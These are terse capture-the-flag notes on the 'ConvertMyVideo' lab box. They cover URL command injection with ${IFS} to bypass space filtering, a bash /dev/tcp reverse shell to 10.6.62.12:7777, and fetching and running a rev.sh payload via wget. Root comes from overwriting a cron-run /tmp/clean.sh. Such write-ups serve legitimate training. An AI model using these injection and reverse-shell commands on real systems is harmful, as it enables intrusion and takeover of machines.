Search

ConvertMyVideo

hint: need pspy for privilege escalation

getting access. Be thorough when checking the burp suite output to not miss a small detail (that your command actually worked)

`ls`

worked but any spaces broke the injection.

How to inject a command with spaces in url?

IFS

`ls${IFS}-la`

reverse shell (IFS’ed):

`/bin/bash${IFS}-l${IFS}>${IFS}/dev/tcp/10.6.62.12/7777${IFS}0<&1${IFS}2>&1`

doesn’t work. Upload file then run it?

make reverse shell sh in transfer:

/bin/bash$ -l > /dev/tcp/10.6.62.12/7777 0<&1 2>&1

wget command IFS’d:

`wget${IFS}http://10.6.62.12/rev.sh`

give it perms command IFS’d:

`chmod${IFS}+x${IFS}rev.sh`

it doesn’t like the plus sign. +x is also 777 so we can:

`chmod${IFS}777${IFS}rev.sh`

now run it:

`./rev.sh`

doesn’t like dot

run it using bash:

`bash${IFS}rev.sh`

do the enum. Nothing.

LinPEAS highlighted some files that keep running but nothing 100% obvious

PSPY gave us a few processes that keep happening and we saw clean.sh in /tmp

make a clean.sh file that gives us reverse shell and replace the one in /tmp

root!